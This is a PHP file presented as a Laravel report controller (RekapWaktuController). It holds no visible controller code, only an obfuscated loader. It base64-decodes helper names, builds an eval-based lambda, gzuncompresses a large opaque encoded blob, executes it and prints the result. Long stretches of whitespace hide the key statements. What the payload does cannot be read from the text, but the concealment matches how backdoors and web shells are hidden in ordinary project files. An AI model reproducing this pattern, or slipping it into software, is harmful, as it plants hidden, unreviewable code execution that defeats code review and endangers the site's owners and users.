<?php 
        $__='printf';$_='Loading app/Http/Controllers/Laporan/RekapWaktuController.php';
        























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































































































                                                                                                                                                                                                                     $________;
